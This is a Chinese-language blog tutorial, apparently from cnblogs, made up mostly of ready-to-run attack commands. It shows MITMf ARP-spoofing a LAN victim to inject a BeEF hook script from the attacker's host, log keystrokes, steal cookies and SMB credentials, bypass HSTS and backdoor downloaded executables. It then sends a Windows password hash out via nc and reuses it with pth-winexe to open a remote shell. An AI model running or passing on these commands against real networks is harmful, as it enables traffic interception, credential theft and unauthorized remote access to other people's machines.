• MITM 中间人攻击


    1. mitmf

    注入xss

    即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码

    如果中间人发生在运营商线路上,很难引起用户注意

    曾经号称最好用的中间人攻击工具

    安装依赖

    apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

    安装virtualenvwrapper

    pip install virtualenvwrapper

    编译virtualenvwrapper.sh

    cd /usr/local/bin

    ls

    source virtualenvwrapper.sh

    注意! virtualenvwrapper.sh脚本的位置取决于你的Linux版本,而不是相同的位置,你可以使用命令: find / -name virtualenvwrapper.sh -print 来查找该文件所在具体位置。

    创建你的python独立运行环境 virtualenv

    mkvirtualenv MITMf -p /usr/bin/python2.7

    clone MITMf仓库

    git clone https://github.com/byt3bl33d3r/MITMf

    进入目录,并且进行初始化

    cd MITMf && git submodule init && git submodule update –recursive

    安装依赖

    pip install -r requirements.txt

    注意: 而且由于依赖很多,安装过程会很漫长,不要中途关机或者网络连接断开。

    OK!安装完成,查看一下帮助

    python mitmf.py –help

    注意注意注意!!!,我们创建的python独立运行环境 virtualenv,一定要首先进入这个独立运行环境中,再来运行MITMF,命令为:

    source /root/.virtualenvs/MITMf/bin/activate # 进入virtualenv

    deactivate # 退出环境

    这样,我们就可以正常使用 mitmf 了。

    启动beef

    cd /usr/share/beef-xss/

    ./beef

    mitmf 中间人注入xss脚本

    # 作为中间人连接网页并插入 js

    root@kali:~# cd MITMf

    root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –inject –js-url http://192.168.199.112:3000/hook.js

    浏览的网页已经被注入了xss code了!!!

    键盘记录器

    # 键盘记录器 –jskeylogger

    root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –jskeylogger

    其他模块

    # 图片翻转:–upsidedownternet

    # 屏幕截图:–screen(/var/log/mitmf)

    root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –upsidedownternet

    # cookie:–ferretng(cookie) 抓取cookie

    root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –ferretng

    # 浏览器及插件信息: –browserprofiler

    # smb:–smbtrap、–smbauth

    旁路 –hsts

    HTTP Strict Transport Security

    防止协议降级、cookie窃取

    安全策略通过HTTP响应头 “Strict-Transport-Security“实施

    限制 user-agent、https 等

    凌空插后门 –filepwn

    用户下载的可执行程序在经过代理的时候,会被插入后门

    其他欺骗

    ICMP

    -M icmp:00:11:22:33:44:55/10.0.0.1(真实网关的MAC/IP)

    DHCP

    −M dhcp:192.168.0.30,35,50−60/255.255.255.0/192.168.0.1(DNS)

    Port

    -M port /1.1.1.1/ /1.1.1.2/

    Ndp

    -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/

    2. Pass the Hash (PTH)

    简介

    密码破解耗费时间资源巨大

    使用密文提交给服务器直接完成身份认证

    NTLM/LM是没有加盐的静态HASH密文

    企业中使用ghost等工具克隆安装系统

    pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd

    获取 win7 HASH 值

    使用 kali live iso 登录win7

    nc 传输

    kali:nc -nvlp 333

    win7:nc 192.168.199.116 333

    结果:John:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

    kali 使用 密文直接登录

    root@kali:~# pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //192.168.199.116 cmd

  • 相关阅读:
    使用微软消息队列实现C#进程间通信(转)
    JavaScript获得页面区域大小的代码
    我的第一份外包经历及所得 (转)
    用Aptana调试JavaScript教程(转)
    NET中的消息队列
    c#线程基础之线程控制
    c#线程基础之原子操作
    sql2005分区表示例
    系统资源调用和shell32.dll简介
    Windows API入门简介
  • 原文地址:https://www.cnblogs.com/micr067/p/12519771.html
Copyright © 2020-2023  润新知